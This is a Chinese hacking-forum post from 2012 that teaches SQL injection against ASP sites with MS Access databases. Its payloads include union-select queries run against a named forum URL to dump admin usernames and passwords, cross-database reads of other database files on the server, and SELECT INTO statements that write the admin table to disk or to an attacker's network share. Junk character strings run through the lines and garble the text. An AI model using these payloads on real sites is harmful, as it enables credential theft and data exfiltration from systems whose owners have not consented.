--------------------------------------------------------------& E8 R* F6 V& `9 h9 Y; P L% V
union查询法
8 s6 U. Y) p: ^# e; L! Z( F' J首先要说的就是查询办法,一般的查询办法就是
8 ~# ?0 r% U/ _" @1 r
0 F% a1 p) o0 m4 S, M程序代码
$ s8 y* q; e. O! f/ O+ o+ r. iand 1=(select count(*) from admin where left(id,1)='1')& z, Z# k1 c; ?0 g+ m
6 z( x- |. ]: z. o% e: P# k
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.1 {0 I( M4 F# ]
所以这个时候,union select横空出现.别以为只能在PHP里用哦...' S) l s2 n% L3 u4 z7 Q$ M
譬如你有一个ACCESS点:
3 ^- R: N6 E U2 e' G+ j% E- z8 J程序代码
) B3 ?0 G# L/ S1 n0 Y0 _3 A0 Ahttp://bbs.tian6.com/xiaoyang.asp?coder=1
; [$ h! x3 |; b0 { e1 I( S+ _6 }# H+ y' y
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
2 `' N- Z2 z9 c. E/ I然后我们直接来:
3 q: n) j% l6 W | J4 ?# z! V程序代码
8 T/ ?! X9 a7 A! E/ V) e8 dhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
. ^' K0 r; z$ ~! P$ d" h0 x0 |9 v$ ~. _" | k
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.- E4 `2 ^+ o8 b6 R) i; e
1 X1 n+ [/ H( o4 N7 D( F
, ]4 {% k4 D% n. k0 B8 L
* ~& E( r2 j5 L* l; O---------------------------------------------------------------
& f7 T6 }; N) \8 i! ]5 b7 SAccess跨库查询
! f( b' J; n$ z8 i o h0 A1 t有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的." ?" W, n, ^. E( h3 r
跨库的查询语句:
! E, V) v0 ]: u' [+ {1 U( x6 {子查询:' v6 Y' N8 @( R- Z4 ~
程序代码
, ~' Q" w! e! ^4 J. g' vand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
% Q( S9 N- a! [2 z0 O" |1 B! T3 z; i% D" e6 U
union查询:
, Q k. E1 x! h; E A程序代码3 {. m' D. }) w3 o# K, Y% T
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
( P3 V3 b* `" t3 p% b5 H9 X* N) I$ U! N# f# r$ C
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
+ p6 Z( B2 z$ k, _2 N8 L程序代码
( g7 h3 W' [3 F4 _1 e' @; F8 N7 lhttp://www.4ngel.net/article/46.htm $ Z' N' W6 h" f
http://hf110.com/Article/hack/rqsl/200502/66.html
% l* H1 ?5 a" K1 O) c. k" j' X+ E( D' f( M8 i$ k' q) G
---------------------------------------------------------------
/ d5 q0 \8 t1 p/ l4 T. D5 CAccess注入,导出txt,htm,html9 m! P, w9 u& p! g( r4 M; n/ a
子查询语句:
, u8 [7 c( e1 H1 b2 E程序代码: U3 C8 r5 v* b$ c4 ?# Z6 d0 Z
Select * into [test.txt] in 'd:\web\' 'text;' from admin
, K6 p1 \3 V& j
8 Z. G/ d3 P% b/ ^这样就把admin表的内容以test类型存进了d:\web里面.& R8 J" S7 R) e. H8 ^
UNION查询:
- f. s! K) [, B, O) e* Q3 @3 c程序代码: I1 `4 S4 |! [) f, r: p6 `
union select * into [admin.txt] in 'c:\' 'test;' from admin
8 I6 G# m1 e5 P: E" K, c6 A) _2 e) e) }) j. \# x: K
而且这里也可以保存到本地来:( o ~$ R! P+ d. g
程序代码
9 Q9 s) ]4 n8 R% I6 vSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
, O8 d6 C. |) ]3 M& l# u. y* @# H% S7 |8 N. d$ X
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:) B* o& F4 w' e9 q
8 G) d$ N/ o3 ]7 B% C
程序代码; U( v2 |0 N# z0 D4 {$ N! e, M
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
6 j+ X, x+ \1 Q5 T+ m" I. i- F9 E! Z' Z' T
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
. ^, M1 O* G7 P3 o$ r2 v |
发表于 2012-9-15 14:20:57
收藏
支持
反对